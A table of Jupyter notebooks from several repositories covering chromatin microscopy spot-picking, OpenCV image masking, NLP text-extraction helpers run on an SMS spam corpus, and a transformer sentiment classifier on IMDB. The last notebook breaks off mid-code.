code
stringlengths 38
801k
| repo_path
stringlengths 6
263
|
|---|---|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # 0. required packages for h5py
# +
# %run "..\..\Startup_py3.py"
sys.path.append(r"..\..\..\..\Documents")
import ImageAnalysis3 as ia
# %matplotlib notebook
from ImageAnalysis3 import *
print(os.getpid())
import h5py
from ImageAnalysis3.classes import _allowed_kwds
import ast
# -
# # 1. Create field-of-view class
# +
reload(ia)
reload(classes)
reload(classes.batch_functions)
reload(classes.field_of_view)
reload(io_tools.load)
reload(visual_tools)
reload(ia.correction_tools)
reload(ia.correction_tools.alignment)
reload(ia.spot_tools.matching)
reload(ia.segmentation_tools.chromosome)
reload(ia.spot_tools.fitting)
fov_param = {'data_folder':r'\\10.245.74.158\Chromatin_NAS_6\20201002-B_dox-IAA-STI+_CTP-08_IgH',
'save_folder':r'\\10.245.74.212\Chromatin_NAS_2\IgH_analyzed_results\20201002_IgH_proB_iaa_dox+',
#'save_folder':r'D:\Pu_Temp\202009_IgH_proB_DMSO_2color',
'experiment_type': 'DNA',
'num_threads': 20,
'correction_folder':r'\\10.245.74.158\Chromatin_NAS_0\Corrections\20201012-Corrections_2color',
'shared_parameters':{
'single_im_size':[35,2048,2048],
'corr_channels':['750','647'],
'num_empty_frames': 0,
'corr_hot_pixel':True,
'corr_Z_shift':False,
'min_num_seeds':500,
'max_num_seeds': 2500,
'spot_seeding_th':125,
'normalize_intensity_local':True,
'normalize_intensity_background':False,
},
}
# -
fov = classes.field_of_view.Field_of_View(fov_param, _fov_id=3,
_color_info_kwargs={
'_color_filename':'Color_Usage',
},
_prioritize_saved_attrs=False,
)
# ### 2. Process image into candidate spots
# +
reload(io_tools.load)
reload(spot_tools.fitting)
reload(correction_tools.chromatic)
reload(classes.batch_functions)
# process image into spots
id_list, spot_list = fov._process_image_to_spots('unique',
#_sel_ids=np.arange(41,47),
_load_common_reference=True,
_load_with_multiple=False,
_save_images=True,
_warp_images=False,
_overwrite_drift=False,
_overwrite_image=False,
_overwrite_spot=False,
_verbose=True)
# -
# # 3. Find chromosomes
# ## 3.1 load chromosome image
overwrite_chrom = True
chrom_im = fov._load_chromosome_image(_type='forward',
_overwrite=overwrite_chrom)
# ## 3.2 find candidate chromosomes
chrom_coords = fov._find_candidate_chromosomes_by_segmentation(_filt_size=4,
_binary_per_th=99.75,
_morphology_size=2,
_overwrite=overwrite_chrom)
# ## 3.3 select among candidate chromosomes
chrom_coords = fov._select_chromosome_by_candidate_spots(_good_chr_loss_th=0.3,
_cand_spot_intensity_th=200,
_save=True,
_overwrite=overwrite_chrom)
# ### visualize chromosomes selections
# +
# %matplotlib notebook
# %matplotlib notebook
## visualize
coord_dict = {'coords':[np.flipud(_coord) for _coord in fov.chrom_coords],
'class_ids':list(np.zeros(len(fov.chrom_coords),dtype=np.int)),
}
visual_tools.imshow_mark_3d_v2([fov.chrom_im],
given_dic=coord_dict,
save_file=None,
)
# -
# ## select spots based on chromosomes
fov._load_from_file('unique')
# +
intensity_th = 200
from ImageAnalysis3.spot_tools.picking import assign_spots_to_chromosomes
kept_spots_list = []
for _spots in fov.unique_spots_list:
kept_spots_list.append(_spots[_spots[:,0] > intensity_th])
# finalize candidate spots
cand_chr_spots_list = [[] for _ct in fov.chrom_coords]
for _spots in kept_spots_list:
_cands_list = assign_spots_to_chromosomes(_spots, fov.chrom_coords)
for _i, _cands in enumerate(_cands_list):
cand_chr_spots_list[_i].append(_cands)
print(f"kept chromosomes: {len(fov.chrom_coords)}")
# +
reload(spot_tools.picking)
from ImageAnalysis3.spot_tools.picking import convert_spots_to_hzxys
dna_cand_hzxys_list = [convert_spots_to_hzxys(_spots, fov.shared_parameters['distance_zxy'])
for _spots in cand_chr_spots_list]
dna_reg_ids = fov.unique_ids
dna_reg_channels = fov.unique_channels
chrom_coords = fov.chrom_coords
# select_hzxys close to the chromosome center
dist_th = 3000 # upper limit is 3000nm
good_chr_th = 0.8 # 80% of regions should have candidate spots
sel_dna_cand_hzxys_list = []
sel_chrom_coords = []
chr_cand_pers = []
sel_chr_cand_pers = []
for _cand_hzxys, _chrom_coord in zip(dna_cand_hzxys_list, chrom_coords):
_chr_cand_per = 0
_sel_cands_list = []
for _cands in _cand_hzxys:
if len(_cands) == 0:
_sel_cands_list.append([])
else:
_dists = np.linalg.norm(_cands[:,1:4] - _chrom_coord*np.array([200,108,108]), axis=1)
_sel_cands_list.append(_cands[(_dists < dist_th)])
_chr_cand_per += 1
_chr_cand_per *= 1/len(_cand_hzxys)
# append
if _chr_cand_per >= good_chr_th:
sel_dna_cand_hzxys_list.append(_sel_cands_list)
sel_chrom_coords.append(_chrom_coord)
sel_chr_cand_pers.append(_chr_cand_per)
chr_cand_pers.append(_chr_cand_per)
print(f"kept chromosomes: {len(sel_chrom_coords)}")
# -
# ### EM pick spots
# +
# %matplotlib inline
reload(spot_tools.picking)
from ImageAnalysis3.spot_tools.picking import _maximize_score_spot_picking_of_chr, pick_spots_by_intensities,pick_spots_by_scores, generate_reference_from_population, evaluate_differences
niter= 10
num_threads = 32
ref_chr_cts = None
# initialize
init_dna_hzxys = pick_spots_by_intensities(sel_dna_cand_hzxys_list)
# set save list
sel_dna_hzxys_list, sel_dna_scores_list, all_dna_scores_list = [init_dna_hzxys], [], []
for _iter in range(niter):
print(f"+ iter:{_iter}")
# E: generate reference
ref_ct_dists, ref_local_dists, ref_ints = generate_reference_from_population(
sel_dna_hzxys_list[-1], dna_reg_ids,
sel_dna_hzxys_list[-1], dna_reg_ids,
ref_channels=dna_reg_channels,
ref_chr_cts=ref_chr_cts,
num_threads=num_threads,
collapse_regions=True,
split_channels=True,
verbose=True,
)
plt.figure(figsize=(4,2), dpi=100)
for _k, _v in ref_ct_dists.items():
plt.hist(np.array(_v), bins=np.arange(0,5000,100), alpha=0.5, label=_k)
plt.legend(fontsize=8)
plt.title('center dist', fontsize=8)
plt.show()
plt.figure(figsize=(4,2), dpi=100)
for _k, _v in ref_local_dists.items():
plt.hist(np.array(_v), bins=np.arange(0,5000,100), alpha=0.5, label=_k)
plt.legend(fontsize=8)
plt.title('local dist', fontsize=8)
plt.show()
plt.figure(figsize=(4,2), dpi=100)
for _k, _v in ref_ints.items():
plt.hist(np.array(_v), bins=np.arange(0,5000,100), alpha=0.5, label=_k)
plt.legend(fontsize=8)
plt.title('intensity', fontsize=8)
plt.show()
# M: pick based on scores
sel_hzxys_list, sel_scores_list, all_scores_list, other_scores_list = \
pick_spots_by_scores(
sel_dna_cand_hzxys_list, dna_reg_ids,
cand_channels=dna_reg_channels,
ref_hzxys_list=sel_dna_hzxys_list[-1], ref_ids=dna_reg_ids, ref_channels=dna_reg_channels,
ref_ct_dists=ref_ct_dists, ref_local_dists=ref_local_dists, ref_ints=ref_ints,
ref_chr_cts=ref_chr_cts,
num_threads=num_threads,
collapse_regions=True,
split_channels=True,
return_other_scores=True,
verbose=True,
)
# check updating rate
update_rate = evaluate_differences(sel_hzxys_list, sel_dna_hzxys_list[-1])
print(f"-- region kept: {update_rate:.4f}")
# append
sel_dna_hzxys_list.append(sel_hzxys_list)
sel_dna_scores_list.append(sel_scores_list)
all_dna_scores_list.append(all_scores_list)
plt.figure(figsize=(4,2), dpi=100)
plt.hist(np.concatenate([np.concatenate(_scores)
for _scores in other_scores_list]),
bins=np.arange(-15,0), alpha=0.5, label='unselected')
plt.hist(np.ravel([np.array(_sel_scores)
for _sel_scores in sel_dna_scores_list[-1]]),
bins=np.arange(-15,0), alpha=0.5, label='selected')
plt.legend(fontsize=8)
plt.show()
if update_rate > 0.998:
break
# +
from scipy.spatial.distance import pdist, squareform
sel_iter = -1
final_dna_hzxys_list = []
kept_chr_ids = []
distmap_list = []
score_th = -5
int_th = 300
bad_spot_percentage = 0.5
for _hzxys, _scores in zip(sel_dna_hzxys_list[sel_iter], sel_dna_scores_list[sel_iter]):
_kept_hzxys = np.array(_hzxys).copy()
# remove spots by intensity
_bad_inds = _kept_hzxys[:,0] < int_th
# remove spots by scores
_bad_inds += _scores < score_th
#print(np.mean(_bad_inds))
_kept_hzxys[_bad_inds] = np.nan
if np.mean(np.isnan(_kept_hzxys).sum(1)>0)<bad_spot_percentage:
kept_chr_ids.append(True)
final_dna_hzxys_list.append(_kept_hzxys)
distmap_list.append(squareform(pdist(_kept_hzxys[:,1:4])))
else:
kept_chr_ids.append(False)
kept_chr_ids = np.array(kept_chr_ids, dtype=np.bool)
#kept_chrom_coords = np.array(sel_chrom_coords)[kept_chr_ids]
distmap_list = np.array(distmap_list)
median_distmap = np.nanmedian(distmap_list, axis=0)
# -
loss_rates = np.mean(np.sum(np.isnan(final_dna_hzxys_list), axis=2)>0, axis=0)
print(np.mean(loss_rates))
fig, ax = plt.subplots(figsize=(4,2),dpi=200)
ax.plot(loss_rates, '.-')
ax.set_xticks(np.arange(0,150,20))
plt.show()
kept_inds = np.where(loss_rates<0.2)[0]
# +
imaging_order = []
for _fd, _infos in fov.color_dic.items():
for _info in _infos:
if len(_info) > 0 and _info[0] == 'u':
imaging_order.append(list(dna_reg_ids).index(int(_info[1:])))
imaging_order = np.array(imaging_order, dtype=np.int)
#kept_inds = imaging_order # plot imaging ordered regions
#kept_inds = np.where(loss_rates<0.5)[0] # plot good regions only
kept_inds = np.arange(len(fov.unique_ids)) # plot all
# %matplotlib inline
fig, ax = plt.subplots(figsize=(4,3),dpi=200)
ax = ia.figure_tools.distmap.plot_distance_map(median_distmap[kept_inds][:,kept_inds],
color_limits=[0,600],
ax=ax,
ticks=np.arange(0,150,20),
figure_dpi=500)
ax.set_title(f"proB iaa_dox_STI+, n={len(distmap_list)}", fontsize=7.5)
_ticks = np.arange(0, len(kept_inds), 20)
ax.set_xticks(_ticks)
ax.set_xticklabels(dna_reg_ids[kept_inds][_ticks])
ax.set_xlabel(f"5kb region id", fontsize=7, labelpad=2)
ax.set_yticks(_ticks)
ax.set_yticklabels(dna_reg_ids[kept_inds][_ticks])
ax.set_ylabel(f"5kb region id", fontsize=7, labelpad=2)
#ax.axvline(x=np.where(fov.unique_ids[kept_inds]>300)[0][0], color=[1,1,0])
#ax.axhline(y=np.where(fov.unique_ids[kept_inds]>300)[0][0], color=[1,1,0])
plt.gcf().subplots_adjust(bottom=0.1)
plt.show()
# -
# ## visualize single example
# +
# %matplotlib inline
reload(figure_tools.image)
chrom_id = 4
import matplotlib
import copy
sc_cmap = copy.copy(matplotlib.cm.get_cmap('seismic_r'))
sc_cmap.set_bad(color=[0.5,0.5,0.5,1])
#valid_inds = np.where(np.isnan(final_dna_hzxys_list[chrom_id]).sum(1) == 0)[0]
valid_inds = np.ones(len(final_dna_hzxys_list[chrom_id]), dtype=np.bool) # all spots
fig, ax = plt.subplots(figsize=(4,3),dpi=200)
ax = ia.figure_tools.distmap.plot_distance_map(
distmap_list[chrom_id][valid_inds][:,valid_inds],
color_limits=[0,600],
ax=ax,
cmap=sc_cmap,
ticks=np.arange(0,150,20),
figure_dpi=200)
ax.set_title(f"proB DMSO chrom: {chrom_id}", fontsize=7.5)
plt.gcf().subplots_adjust(bottom=0.1)
plt.show()
ax3d = figure_tools.image.chromosome_structure_3d_rendering(
final_dna_hzxys_list[chrom_id][valid_inds, 1:],
marker_edge_line_width=0,
reference_bar_length=200, image_radius=300,
line_width=0.5, figure_dpi=300, depthshade=False)
plt.show()
# -
# ## visualize all fitted spots
with h5py.File(fov.save_filename, "r", libver='latest') as _f:
_grp = _f['unique']
_ind = list(_grp['ids'][:]).index(41)
_im = _grp['ims'][_ind]
sel_drifts = _grp['drifts'][:,:]
sel_flags = _grp['flags'][:]
sel_ids = _grp['ids'][:]
sel_spots = _grp['spots'][:,:,:]
print(_ind, np.sum(_grp['spots'][1]))
|
5kb_DNA_analysis/single_fov/20201002_updated_single_fov_IgH_batch1_proB_dox+_2color_Franklin.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import stats
import seaborn as sns
# %matplotlib inline
# +
# read in the raw data
# train.csv
df = pd.read_csv('/../projects/project-3-house-prices/assets/train.csv')
# -
|
_posts/test_project3.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Image to features
#
# Read an image with opencv.
# %matplotlib inline
import matplotlib.pyplot as plt
plt.style.use('ggplot')
from jyquickhelper import add_notebook_menu
add_notebook_menu()
# ## OpenCV
# +
import numpy as np
import argparse
import cv2
from numpy import matrix
import os
from functools import reduce
# create NumPy arrays from the boundaries
lower = np.array([0, 0, 0], dtype = "uint8")
upper = np.array([100, 115, 240], dtype = "uint8")
i=0
List= []
folder = "tomates"
if not os.path.exists(folder):
raise FileNotFoundError(os.path.abspath(folder))
for element in os.listdir(folder):
i+=1
# load the image
image = cv2.imread(os.path.join(folder, element))
res = cv2.resize(image,(100, 100), interpolation = cv2.INTER_CUBIC)
# find the colors within the specified boundaries and apply the mask
mask = cv2.inRange(res, lower, upper)
output = cv2.bitwise_and(res, res, mask = mask)
shape = output.shape
nb = reduce(lambda a,b: a*b, shape)
mat = output.reshape((1, nb))
List.append(mat)
print(element, mat.shape)
bigmat = np.vstack(List)
bigmat.shape
# -
from pyquickhelper.helpgen import NbImage
NbImage("tomates/imgt_61.jpg")
|
_doc/notebooks/cheat_sheets/image_features.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # FUNCIONES DE AYUDA AL PROCESADO DE TEXTO
# # MLearner
#
# **MLearner** pretende ser una libreria de herramientas utiles para desarrollar algoritmos de Machine Learning e IA de manera mas facil e intuitiva. El desarrollo de esta libreria me ha servido para adquirir conocimientos de creacion de un proyecto de desarrollo software:
#
# - Integracion Continua y Despliegue Continuo.
#
# - Gestion de Repositorio a nivel de proyecto.
#
# - Gestion de Repositorio OpenSource.
#
# - Clean Code en desarrollo software.
#
# - Frameworks Machine Learning y Deep Learning.
#
# - Automatizacion de testing.
#
# - Documentacion de codigo.
#
# - Documentacion de la Libreria entorno Web.
#
# - Empaquetacion y publicacion en Pypi.
# 
# ### PyPI
# Para instalar **MLearner** ejecute:
# ```python
# pip install mlearner
# ```
#
# Como alternativa, puede descargar el paquete directamente desde PyPI https://pypi.python.org/pypi/mlearner, posteriormente desarchivelo y navegue hasta la ruta del paquete, una vez alli ejecute el siguiente comando:
# ```python
# python setup.py install
# ```
#
# ### Links
# - **Documentation:** https://jaisenbe58r.github.io/MLearner/
# - **Source code repository:** https://github.com/jaisenbe58r/MLearner
# - **PyPI:** https://pypi.python.org/pypi/mlearner
#
# ***
# # Text Helper Functions
#
# Implementation of functions for Natural language Processing
#
# > from mlearner.nlp.helpers import *
# ## Overview
# #### Helpers
#
#
# List of implemented modules:
#
# - URL
# - Emoticons
# - Email
# - Hash
# - Mention
# - Number
# - Phone Number
# - Year
# - Non Alphanumeric
# - Punctuations
# - Repetitive Character
# - Dollar
# - Number-Greater
# - Number-Lesser
# - Dates
# - Only Words
# - Only Numbers
# - Boundaries
# - Search
# - Pick Sentence
# - Duplicate Sentence
# - Caps Words
# - Length of Words
# - Length of Characters
# - Get ID
# - Specific String Rows
# - Hex code to Color
# - Tags
# - IP Address
# - Mac Address
# - Subword
# - Latitude & Longitude
# - PAN
# - Phone Number Country Code
# - Domain
# ## Importacion de Librerias
# +
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from mlearner import nlp
from mlearner.preprocessing import DataAnalyst
from mlearner.utils import keras_checkpoint
import emoji
# %load_ext autoreload
# %autoreload 2
# %matplotlib inline
# -
# ## Carga del dataset
#
# **SMS Spam Collection v.1**
#
# The SMS Spam Collection v.1 (hereafter the corpus) is a set of SMS tagged messages that have been collected for SMS Spam research. It contains one set of SMS messages in English of 5,574 messages, tagged acording being ham (legitimate) or spam.
#
# The Grumbletext Web site is: http://www.grumbletext.co.uk/
# +
file = "data/SMSSpamCollection.txt"
file_csv = "data/SMSSpamCollection.csv"
if not os.path.isfile(file_csv):
text = nlp.open_txt(file).replace("\t", "\n").split("\n")
del text[-1] # Se borra la linea del final
d = {'target': text[0::2], 'text': text[1::2]}
sms = pd.DataFrame(d)
sms.to_csv("data/SMSSpamCollection.csv", index=False)
else:
sms = pd.read_csv(file_csv)
sms.head(5)
# -
dataset = DataAnalyst.load_dataframe(sms)
dataset.distribution_targets(target=["target"])
# ***
# ## Procesado del Texto
data_clean = dataset.data.copy()
# ### URLs
#
# * **find_url(text)**: Busqueda de URLs en el texto
from mlearner.nlp.helpers import find_url
data_clean['url'] = dataset.data['text'].apply(lambda x : find_url(x))
data_clean[data_clean["url"]!=""][["target", "url"]].head(5)
# ***
# ### Emojis
#
#
# * **find_emoji(text)**: Busqueda de emojis en el texto.
#
# * **remove_emoji(text)**: Borra los _emoji_ del texto.
from mlearner.nlp.helpers import find_emoji, remove_emoji
sentence="I play () ... ()"
find_emoji(sentence)
data_clean['emoji'] = dataset.data['text'].apply(lambda x : find_emoji(x))
data_clean['text'] = dataset.data['text'].apply(lambda x : remove_emoji(x))
# ***
# ### Email
#
#
# * **find_email(text)**: Extraccion de emails del texto.
#
from mlearner.nlp.helpers import find_email
data_clean['emails'] = dataset.data['text'].apply(lambda x : find_email(x))
data_clean[data_clean["emails"]!=""][["target", "emails"]].head(5)
# ***
# ### Hash
#
# * **find_hash(text)**: Busqueda de Hashtags en el texto
#
from mlearner.nlp.helpers import find_hash
data_clean['Hash'] = dataset.data['text'].apply(lambda x : find_hash(x))
data_clean[data_clean["Hash"]!=""][["target", "Hash"]].head(5)
data_clean["text"].iloc[471]
# ***
# ### Mention
#
# * **find_at(text)**: Busqueda de menciones "@" en el texto
#
from mlearner.nlp.helpers import find_at
data_clean['Mention'] = dataset.data['text'].apply(lambda x : find_at(x))
data_clean[data_clean["Mention"]!=""][["target", "Mention"]].tail(5)
# ***
# ### Numbers
#
# * **find_number(text)**: Busqueda de numeros en el texto.
#
from mlearner.nlp.helpers import find_number
data_clean['Numbers'] = dataset.data['text'].apply(lambda x : find_number(x))
data_clean[data_clean["Numbers"]!=""][["target", "Numbers"]].head(5)
# ***
# ### Phone Number
#
# * **find_phone_number(text)**: Busqueda de numeros de telefono españoles en el texto.
#
from mlearner.nlp.helpers import find_phone_number
data_clean['phone_number'] = dataset.data['text'].apply(lambda x : find_phone_number(x))
find_phone_number("+34666999666")
# ***
# ### Find Year
#
# * **find_year(text)**: Busqueda de años de nacimiento en el texto [1940-2040]
#
from mlearner.nlp.helpers import find_year
data_clean['Years'] = dataset.data['text'].apply(lambda x : find_year(x))
data_clean[data_clean["Years"]!=""][["target", "Years"]].head(5)
# ***
# ### Non Alphanumeric characters
#
# * **find_nonalp(text)**: Extraccion de caracteres no alfanumericos.
#
from mlearner.nlp.helpers import find_nonalp
data_clean['nonalp'] = dataset.data['text'].apply(lambda x : find_nonalp(x))
data_clean[data_clean["nonalp"]!=""][["target", "nonalp"]].head(5)
# ***
# ### Retrieve punctuations from sentence
#
# * **find_punct(text)**: Signos de puntuacion.
#
from mlearner.nlp.helpers import find_punct
data_clean['find_punct'] = dataset.data['text'].apply(lambda x : find_punct(x))
data_clean[data_clean["find_punct"]!=""][["target", "find_punct"]].head(5)
# ***
# ### Unique Char
#
# * **unique_char(sentence)**: Elimina los caracteres repetidos de una palabra.
#
from mlearner.nlp.helpers import unique_char
sentence="I lovee Machinee learning!"
unique_char(sentence)
# ***
# ### Prices
#
# * **find_coin(text, symbol="$")**: Busqueda de precios en el texto
#
from mlearner.nlp.helpers import find_coin
data_clean['find_coin$'] = dataset.data['text'].apply(lambda x : find_coin(x, symbol="$"))
data_clean[data_clean["find_coin$"]!=""][["target", "find_coin$"]].head(2)
dataset.data['text'].iloc[60]
# ***
# ### Numbers great
#
# * **num_great(text)**: Busqueda de numeros mayores a 930.
#
from mlearner.nlp.helpers import num_great
data_clean['num_great'] = dataset.data['text'].apply(lambda x : num_great(x))
data_clean[data_clean["num_great"]!=""][["target", "num_great"]].head(5)
# ***
# ### Numbers less
#
# * **num_less(text)**: Busqueda de numeros menores a 930.
#
from mlearner.nlp.helpers import num_less
data_clean['num_less'] = dataset.data['text'].apply(lambda x : num_less(x))
data_clean[data_clean["num_less"]!=""][["target", "num_less"]].tail(5)
# ***
# ### Find Dates
#
# * **find_dates(text)**: Busqueda de fechas [mm-dd-yyyy]
#
from mlearner.nlp.helpers import find_dates
sentence="Todays date is 04/28/2020 for format mm/dd/yyyy, not 28/04/2020"
find_dates(sentence)
data_clean['find_dates'] = dataset.data['text'].apply(lambda x : find_dates(x))
# ***
# ### Only Words
#
# * **only_words(text)**: Eliminar los numeros del texto.
#
from mlearner.nlp.helpers import only_words
data_clean['only_words'] = dataset.data['text'].apply(lambda x : only_words(x))
data_clean[data_clean["only_words"]!=""][["target", "only_words"]].head(5)
# ***
# ### Search Key
#
# * **search_string(text, key)**: Comprobar existencia de palabras en la frase.
#
from mlearner.nlp.helpers import search_string
data_clean['search_string'] = dataset.data['text'].apply(lambda x : search_string(x,' day '))
data_clean[data_clean["search_string"]==True][["target", "search_string"]].head(5)
data_clean["text"].iloc[163]
# ***
# ### pick only key sentence
#
# * **pick_only_key_sentence(text, keyword)**: Devuelve las frases que contiene la palabra (Keyword) seleccionada.
#
from mlearner.nlp.helpers import pick_only_key_sentence
data_clean['pick_only_key_sentence'] = dataset.data['text'].apply(lambda x : pick_only_key_sentence(x,' day '))
data_clean[data_clean["pick_only_key_sentence"]!=""][["target", "pick_only_key_sentence"]].iloc[163:165]
# ***
# ### pick unique sentence
#
# * **pick_unique_sentence(text)**: Elimina frases duplicadas
from mlearner.nlp.helpers import pick_unique_sentence
sentence="I thank doctors\nDoctors are working very hard in this pandemic situation\nI thank doctors"
pick_unique_sentence(sentence)
data_clean['pick_unique_sentence'] = dataset.data['text'].apply(lambda x : pick_unique_sentence(x))
# ***
# ### Capital words
#
# * **find_capital(text)**: Busqueda de palabras con primera letra en mayuscula.
from mlearner.nlp.helpers import find_capital
data_clean['find_capital'] = dataset.data['text'].apply(lambda x : find_capital(x))
data_clean[data_clean["find_capital"]!=""][["target", "find_capital"]].head(5)
# ***
# ### Remove tag html
#
# * **remove_tag(text)**: Elimina los tags de html.
from mlearner.nlp.helpers import remove_tag
sentence="Markdown sentences can use <br> for breaks and <i></i> for italics"
remove_tag(sentence)
data_clean['remove_tag'] = dataset.data['text'].apply(lambda x : remove_tag(x))
# ***
# ### Mac address
#
# * **mac_add(text)**: Busqueda de _Mac address_ en el texto
from mlearner.nlp.helpers import mac_add
sentence="MAC ADDRESSES of this laptop - 00:24:17:b1:cc:cc. Other details will be mentioned"
mac_add(sentence)
data_clean['mac_add'] = dataset.data['text'].apply(lambda x : mac_add(x))
# ***
# ### IP address
#
# * **ip_add(text)**: Busqueda de _IP address_ en el texto
from mlearner.nlp.helpers import ip_add
sentence="An example of ip address is 172.16.17.32"
ip_add(sentence)
data_clean['ip_add'] = dataset.data['text'].apply(lambda x : ip_add(x))
# ***
# ### Extract number of subwords
#
# * **subword(string, sub)**: Devuelve el numero de veces que aparece la raiz de la palabra.
from mlearner.nlp.helpers import subword
sentence = 'Fundamentalism and constructivism are important skills'
subword(sentence,'ism') # change subword and try for others
data_clean['subword'] = dataset.data['text'].apply(lambda x : subword(x, "on"))
data_clean[["target", "text", "subword"]].head(5)
# ***
# ### Valid latitude & longitude
#
# * **lat_lon(string)**: Devuelve si el dato de Latitud y longitud es correcto.
from mlearner.nlp.helpers import lat_lon
lat_lon('28.6466772,76.8130649', display=True)
lat_lon('2324.3244,3423.432423', display=True)
data_clean['lat_lon'] = dataset.data['text'].apply(lambda x : lat_lon(x))
data_clean[["target", "text", "lat_lon"]].head(5)
# ***
# ### Valid latitude & longitude
#
# * **find_domain(string)**: Devuelve si el dato de Latitud y longitud es correcto.
from mlearner.nlp.helpers import find_domain
data_clean['find_domain'] = dataset.data['text'].apply(lambda x : find_domain(x))
data_clean[["target", "text", "find_domain"]].iloc[10:15]
data_clean["text"].iloc[12]
# ***
data_clean.T
|
docs/sources/user_guide/nlp/Text Helper Functions.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import re
ipdta= open('Dataset.txt').read()
#source
#get sentences
ntext=re.split('\n',ipdta)
#destination file
text_file = open("TestingData.txt", "w")
#put only 100k lines
for i in range(0,100000):
ntext[i]=ntext[i]+'\n'
text_file.write(ntext[i])
text_file.close()
print('Testing Data Made 10% LOL')
|
GetTestingData.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + id="lPv-MdE1sAkJ" outputId="33036546-2419-4f28-b9e8-e0f5a717eb9e" colab={"base_uri": "https://localhost:8080/", "height": 35}
from google.colab import drive
drive.mount('/content/drive/')
# + id="zfzXOqAksG4_" outputId="4bc12ec6-d142-47a5-d41e-e26f4bd0aa3c" colab={"base_uri": "https://localhost:8080/", "height": 35}
# %cd /content/drive/My Drive/Colab Notebooks/Transformers
# + id="7w5MgG3quSsn"
import torch
from torch import nn
from torch.autograd import Variable
import torch.nn.functional as F
from torchtext import data, datasets, vocab
import numpy as np
import matplotlib.pyplot as plt
from torch.utils.tensorboard import SummaryWriter
import random, tqdm, sys, math, gzip, os
from utils.util import d, save_checkpoint, load_checkpoint
from transformers import CTransformer
# + id="1mkXj0VJu3Ts"
def trainF(model, train_loader, val_loader, num_epochs, criterion, save_name):
gradient_clipping = 1.0
best_val_loss = float("Inf")
train_losses = []
val_losses = []
for epoch in range(num_epochs):
running_loss = 0.0
model.train()
print('Starting epoch ' + str(epoch + 1))
for batch in tqdm.tqdm(train_loader):
input = batch.text[0].to(device)
label = batch.label - 1
label = label.to(device)
if input.size(1) > mx:
input = input[:, :mx]
out = model(input)
loss = criterion(out, label)
# Backward and optimize
optimizer.zero_grad()
loss.backward()
#clip gradients
if gradient_clipping > 0.0:
nn.utils.clip_grad_norm_(model.parameters(), gradient_clipping)
optimizer.step()
scheduler.step()
running_loss += loss.item()
avg_train_loss = running_loss / len(train_loader)
train_losses.append(avg_train_loss)
val_running_loss = 0.0
with torch.no_grad():
model.eval()
tot, cor = 0.0, 0.0
for batch in val_loader:
input = batch.text[0].to(device)
label = batch.label - 1
label = label.to(device)
if input.size(1) > mx:
input = input[:, :mx]
out = model(input)
loss = criterion(out, label)
val_running_loss += loss.item()
tot += float(input.size(0))
cor += float((label == out.argmax(dim=1)).sum().item())
acc = cor/tot
print("validation accuracy {:.3f}".format(acc))
avg_val_loss = val_running_loss / len(val_loader)
val_losses.append(avg_val_loss)
print('Epoch [{}/{}],Train Loss: {:.4f}, Valid Loss: {:.8f}'
.format(epoch+1, num_epochs, avg_train_loss, avg_val_loss))
if avg_val_loss < best_val_loss:
best_val_loss = avg_val_loss
save_checkpoint(save_name, model, optimizer, best_val_loss)
print("Finished Training")
return train_losses, val_losses
# + id="emkAqGP3aqiD"
# evaluation metrics
def eval(model, test_loader):
with torch.no_grad():
model.eval()
correct = 0
print('Starting Iteration')
count = 0
for batch in test_loader:
input = batch.text[0].to(device)
label = batch.label - 1
label = label.to(device)
if input.size(1) > mx:
input = input[:, :mx]
out = model(input)
if label == out.argmax(dim=1):
correct += 1
count += 1
print("Current Count is: {}".format(count))
print('Accuracy on test set: {}'.format(correct/count))
# + id="nqKZW8XLvfil"
vocab_size = 50000
batch_size = 4
LOG2E = math.log2(math.e)
TEXT = data.Field(lower=True, include_lengths=True, batch_first=True)
LABEL = data.Field(sequential=False)
# + id="w1teRHsCvldI" outputId="3f62b9be-6d90-4723-ff6e-da9ad6e71699" colab={"base_uri": "https://localhost:8080/", "height": 52}
tdata, test = datasets.IMDB.splits(TEXT, LABEL, root='/content/drive/My Drive/Colab Notebooks/Transformers/.data/')
train, val = tdata.split(split_ratio=0.8)
TEXT.build_vocab(train, max_size=vocab_size - 2)
LABEL.build_vocab(train)
# + id="g-6MFaBB-i43"
train_iter = data.BucketIterator(train, batch_size=batch_size, device=d())
val_iter = data.BucketIterator(val, batch_size=1, device=d())
test_iter = data.BucketIterator(test, batch_size=1, device=d())
# train_loader = torch.utils.data.DataLoader(train, batch_size=batch_size, num_workers=10)
# val_loader = torch.utils.data.DataLoader(val, batch_size=1, num_workers=0, shuffle=True)
# test_loader = torch.utils.data.DataLoader(test, batch_size=1, num_workers=0, shuffle=True)
# + id="2dXfGk60wQFI" outputId="4b83ae54-080d-4cc8-bb6c-64da6a3b3d5c" colab={"base_uri": "https://localhost:8080/", "height": 69}
print(f'- nr. of training examples {len(train_iter)}')
print(f'- nr. of validation examples {len(val_iter)}')
print(f'- nr. of test examples {len(test_iter)}')
# + id="0KSfaIHpzC-a" outputId="df6bc5d1-98fe-4da3-87a1-70ff3790ad01" colab={"base_uri": "https://localhost:8080/", "height": 1000}
NUM_CLS = 2
embedding_size = 128
num_heads = 8
depth = 6
max_length = 512
max_pool = True
if max_length < 0:
mx = max([input.text[0].size(1) for input in train_iter])
mx = mx * 2
print(f'- maximum sequence length: {mx}')
else:
